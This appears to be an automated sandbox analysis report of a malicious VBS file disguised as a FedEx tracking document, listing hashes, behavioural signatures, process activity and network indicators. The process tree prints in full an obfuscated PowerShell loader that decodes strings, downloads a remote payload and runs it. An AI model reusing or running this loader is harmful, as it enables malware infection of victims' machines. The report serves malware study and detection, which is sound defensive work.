Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
22/04/2024, 13:21
Static task
static1
Behavioral task
behavioral1
Sample
CR-FEDEX_TN-775537409198_Doc.vbs
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
CR-FEDEX_TN-775537409198_Doc.vbs
Resource
win10v2004-20240412-en
General
-
Target
CR-FEDEX_TN-775537409198_Doc.vbs
-
Size
58KB
-
MD5
7adbafc63cc01ebeae27fd4074430da1
-
SHA1
9868805bad5478b2400d637b268f1aebea0b6c67
-
SHA256
fb712dfc934fe7630f1e6e2b2bd79be641de26accc34fda08c3f6e269d40c9b4
-
SHA512
a5623d714f6b49857bbb19a0c9727e63f4259d234d4226100954bba94eac7f4e0aa5b5510cc94d0629c78ae35ef28c19e8ba46caf490190f28a9136af578ebe0
-
SSDEEP
768:82p/fwNaKj7gHrI0i3wPDPM+A0s2hyOX0Q4afFysrmUYAYB8nq7rIF9NISEqQEs2:7ukLI1gPDPTxyk0MfFCNqnASLQE66
Malware Config
Signatures
-
Blocklisted process makes network request 35 IoCs
flow pid Process 3 5000 WScript.exe 17 220 powershell.exe 24 220 powershell.exe 45 220 powershell.exe 62 220 powershell.exe 70 220 powershell.exe 86 220 powershell.exe 101 220 powershell.exe 117 220 powershell.exe 131 220 powershell.exe 143 220 powershell.exe 156 220 powershell.exe 171 220 powershell.exe 184 220 powershell.exe 202 220 powershell.exe 228 220 powershell.exe 245 220 powershell.exe 264 220 powershell.exe 279 220 powershell.exe 294 220 powershell.exe 311 220 powershell.exe 328 220 powershell.exe 346 220 powershell.exe 372 220 powershell.exe 386 220 powershell.exe 407 220 powershell.exe 431 220 powershell.exe 432 220 powershell.exe 437 220 powershell.exe 438 220 powershell.exe 439 220 powershell.exe 440 220 powershell.exe 441 220 powershell.exe 442 220 powershell.exe 443 220 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2432 ping.exe 1052 ping.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 220 powershell.exe 220 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 220 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 5000 wrote to memory of 2432 5000 WScript.exe 87 PID 5000 wrote to memory of 2432 5000 WScript.exe 87 PID 5000 wrote to memory of 1052 5000 WScript.exe 89 PID 5000 wrote to memory of 1052 5000 WScript.exe 89 PID 5000 wrote to memory of 1500 5000 WScript.exe 92 PID 5000 wrote to memory of 1500 5000 WScript.exe 92 PID 5000 wrote to memory of 220 5000 WScript.exe 94 PID 5000 wrote to memory of 220 5000 WScript.exe 94 PID 220 wrote to memory of 3716 220 powershell.exe 96 PID 220 wrote to memory of 3716 220 powershell.exe 96
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CR-FEDEX_TN-775537409198_Doc.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Windows\System32\ping.exeping google.com -n 12⤵
- Runs ping.exe
PID:2432
-
-
C:\Windows\System32\ping.exeping %.%.%.%2⤵
- Runs ping.exe
PID:1052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir2⤵PID:1500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Memoirer = 1;$Pennefjerene245='Substrin';$Pennefjerene245+='g';Function Tabellariske($Assessorerne57){$Dekorationernendmarcherne110=$Assessorerne57.Length-$Memoirer;For($Dekorationerne=5; $Dekorationerne -lt $Dekorationernendmarcherne110; $Dekorationerne+=(6)){$Egebark130+=$Assessorerne57.$Pennefjerene245.Invoke($Dekorationerne, $Memoirer);}$Egebark130;}function Gdedes($Ondograph){. ($Parkin) ($Ondograph);}$Frieri=Tabellariske 'ForarMChimeoSexopzEmceiipiepolMyt.olBundtaNaiad/ H gh5 C,it.Af.en0Drost Nabog(EmissWC mplibve.sn ,ynadInsnao Connw L,cosEf.er BrugsNNonalT utb Sind1 roer0Paros.Balka0B,dri;.rama TsarWD sbei,enitn N gl6borts4energ;Fulda HistixTauri6 m da4Kotur; S is DietarRallyvVeri,:Frems1P eli2Condy1zinco.Falte0Eksam) Str. OminsGEmbedesaccucmakkek Ev noAfgjo/My.op2penci0Malmh1 U,fe0Forew0Prste1Syntr0St.ve1Fremm BilfFGo.hii futurBookse T.ecfNonc,oBebudxSe io/Burd.1Color2Ibrug1 Kniv.tel f0 Indu ';$Tempestuous=Tabellariske ',olarUmak,osBlokaeU nigrGodst-SuperA Spl,gUneleenarcin Salgtj,bga ';$Volow159=Tabellariske 'cab.ahGeno.tShirttPediapNedis:Fac.n/ Post/ PeaicFurazrStuddyKidnapDipletaktivo .inecApotehAquilrColanoJomfrnDeveliA,axicForudl Afpae tchbsUrteh.Inte.i YeddoPebfl/Trai mB.comgnon xbF.ssioadult1 Past/Mo.phNBerneoNytten Un riL.gnenLjsersEsdratArbejrS.steuSve,dm Bride,onzanIndkotW,undaHyinglA onilOptniyBlaaj. KeypqQuarrxVelgrd,adde ';$Baandvv=Tabellariske 'Dolme>Skots ';$Parkin=Tabellariske 'PassiiElapie VicexOps.g ';$Sulevlling = Tabellariske 'Cu che BreacOrdenhBeordoWald Si e%Ska.ra Fly.pNyh,dpSlumpdd.mmea ploutCl imaAgerd%Tis.y\S,adspSyndia ccenrCompaa ,tond rndbeBio,erS,cari kottnYuckegToxiceBlok rKhasanFerieeSekse.AdderSProcttCabb ePortu Unpro& Asso& Calf SteneGemysc Eva h Kro oHardd resse$St.ep ';Gdedes (Tabellariske 'spiro$Rea.cgMytholovertoL gnebHyperaArmodlArres:Arb.jRKrtegoTeknosOprems PulveSemibl Corrl.ibleifarmanRat fi CavosHand,=Verek(UdstacEutopmSubcodgulvm Noti / Terrc abel Dupli$BrainSTertiu ovolDrbyseHenlevBrsspl Gyptlsouthi FundnInterg Stil)Justi ');Gdedes (Tabellariske 'Appea$MahargGodmol nteroA,klebMusicaConfelYd rp:Poss,eProc,kDukkesK.ffepB.lene Teatr BalatBespalWhirriS.cren PinciHethie ensn .nre=,picl$avlsdVThougo,heumlelen,oKvad wTopch1Weeke5Infer9Defer.billasBefarpCecidlTekniiManu.tLeuco(Hjem $,orplBAloeraIncapaHa slnNaiandKollev SemivScoa.)Permi ');$Volow159=$ekspertlinien[0];Gdedes (Tabellariske 'Macro$ SkrmgBushwlAdelsoAmfetbHvsnia BlodlNapol:FormesLovemo.ommal.ocioo Car.sM.onspHieroiAfrunlFemk s Serp= C emN Vej eCrompwAnger-Sta.lOSmigrb DeltjIndisefarvecEnougtLin,e eng,SCiselyF.ttos Bar,tHori eAntismFe,ul.CanceNForlgeBemantchlor.CesarWInstreDakenb CephC Menfl AstriTandbePerfen Sup tStopp ');Gdedes (Tabellariske 'Forre$F,rgas PredoImagelI,iotoGammes r,bepAccidiAnkyllOverasPyrom. P nkHgoldbeSmrreaFrygtdKul.ieS.brarsrbehs Ho o[Pr,co$SquifTKloake C.ibmMacroppaakre Ove.sKalcitPreacuHftesoKasseu eromsWalki],hoto= Swiz$ Par F ejrrDefiniEl.cte SnuprNr.esiComba ');$Klavringernes=Tabellariske ',opias VandoeyebalFelteoInd.vsa delpOmdigiSu epl,rbejsPipp .La.erD,nfrioOpjuswSalpenMesual Deoro teskaDipoldSpillFPacifiFiskelrockseSkils( Fej.$P,abeVCarlooAntiklKonfio Bundw Gul 1Bagbo5A yno9 Logi,Unslu$VigtiA Tegmnol.nek raspeUnautrAbrentBorlao ablivafstieEnsur)Sec n ';$Klavringernes=$Rossellinis[1]+$Klavringernes;$Ankertove=$Rossellinis[0];Gdedes (Tabellariske 'S.ffg$S,bbagRe.nflUbefooDys.nbAner a Carplr,tif:,obisF afizr OrphuInt,rg UnbrtTeknobLnsl.aPlainrFrasigFastgrPaickeUnspurRetra=M seg(SukkuT,roomefjerrsResentMakul-AliauP AtteaSpindtOverfhVandf exa i$Sk,ttA commnVe.nikUn,ove Au.frAbbretVin,ioDe itv LinceA.skr) Rett ');while (!$Frugtbargrer) {Gdedes (Tabellariske 'Jerng$ MerrgAarsrlOptegoHamshb denaaBard lUstem:OvergS I,ery UsannsnekktInhumhInd.aeEngh.t I raiFeriezCirkueV,ema=Fores$TeglbtUnderrDiagouKup feInves ') ;Gdedes $Klavringernes;Gdedes (Tabellariske 'CyberSEnesttSalutaOpe,sr Naalt Quee-EkstrSRosellDemi,eForsteVariop refa Fluk4Gonyd ');Gdedes (Tabellariske 'Deta $RejecgR tsblZonolo .lotb misua MisllB,lle:KrigsFS,iborKeratu ,ansgS,mittSpr tb CoraaSpondrforsvgHellmr No.ceSk,anrSa,dw=Fulds( RegeT Las,ePol,asIsomytGraat- DobsPPiacuaTv.ngtP inthGrote Reass$Ya,ilADispenDep.skFjrteeKavalrNeo.etRumbloKampkv.esoneOverh)Freud ') ;Gdedes (Tabellariske 'Caddi$,himagTold lStandoAdoxybHiks aGeotelT,lea:ReaccTSuperrDucesu SebomSundsbRoityuE,uislLapwil alle=Fejlr$TonyagHollylPoly.oSerapbB,byeaR,drilVasew:PulteRHjertoSuppocUsknsk HypoefranatPseuds onseo in,vnNcr.adVal reBrend+Fissi+Tekst%Brkke$Saltwe avekk NonisAsta p exadeCruderConcot M sal Footi MononEdderi Til eAnmelnPocke.fa.tocLimsioHappeucoatcnVi,out ,oub ') ;$Volow159=$ekspertlinien[$Trumbull];}Gdedes (Tabellariske ' Indk$mar,ig AmpllSadd,o H.libpolluatv,salBag p: Galls aneltsejr uFribidBecchi B.mbeSupersDicertslidba Ph.trS.vmut BarkePedatnNotatsPenep .aban= Sch, AbonnG kloveOccastFunki-benigCFaglro Ma ynslogetTrummeRhysln BucktS olo Pha c$ aloAHun anU,dsikVarineGloeorFranctArtero H anvRenoveBibli ');Gdedes (Tabellariske ' Lupo$LegisgGalenlReempoUnderbCoccaaKillil Apo.:v.gtiMSoy saRenovrUndergPr.enr RepriH.ksetForldtprei, Brdgr=Sc pi Styr[ IgniSS,ratyJibeds Rep t Autoe aarem Dall.StorsCPegleoSupranFlokuv DefleFossirApol.tAzofo]hydro:Unhog:Ro.usFRe,ssrnonaso dekomam,noBPreseaSavvrs Ungre M ri6,iled4TetroS.ardatFoyairW.sleiRowlonMaringIn.ox(Indha$P.ntssOpvejtIntrauSt ttd.eliei SmaseP otosPrintt ,nasaLa gtrIdriftSaftfe,allanc.ntas,usto) eres ');Gdedes (Tabellariske 'Hidse$ o cug Predl ErucoLinchbGam eaIguanl Gg,e:B.gmaTlambar MailaMa.chpIs,pepValene Skama.ngdof t,sesOrdinaAnt,otskratsFlytteApayanAller2 S,hi8Undut S,egl= Poli Jakke[guldsSKronry A.tas ImpotCry.te,evalmSkrle.UglisT Wan.eSexlexSurtat Kat,.ElasmELandbninwo,cGrinco Upprd.empeiZelann eukigSail,]Fjort:Tilbu: Du.gA AngkSAbbreCForseIholodIT,akt. diveGSystee,rilltTsarrSBispitDiskbrProngiHy ern bedrgMonos( Paed$KnbesMsparkaBjr erAllesg,egahrPa.kyi MedltTri.ytTroph) Sain ');Gdedes (Tabellariske 'S.abi$ chamg,nasslEclogo.dlbsbGeneraMonotl Lage:Re.urH ZoneeOver.lBarnabDodonrselvseKorpodChipbe dados Sklm=Unpor$BolsmTUnoxirGo rmaocca pIdoispKiddyeKlammaTredrfSacrasRe utabyraatFeyess SledeAdresn tlnd2cocks8Penny.DigitsLukrzuShowgbUva,osSeasitSpedirStilliSlavinPhotag .alc(Death3Thear2Allow9Bekko6 Afte9 Apot6Rem,u, Sig.2 Fdev9 extr0Kendt2Skrig3 For.) Frem ');Gdedes $Helbredes;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:220 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\paraderingerne.Ste && echo $"3⤵PID:3716
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82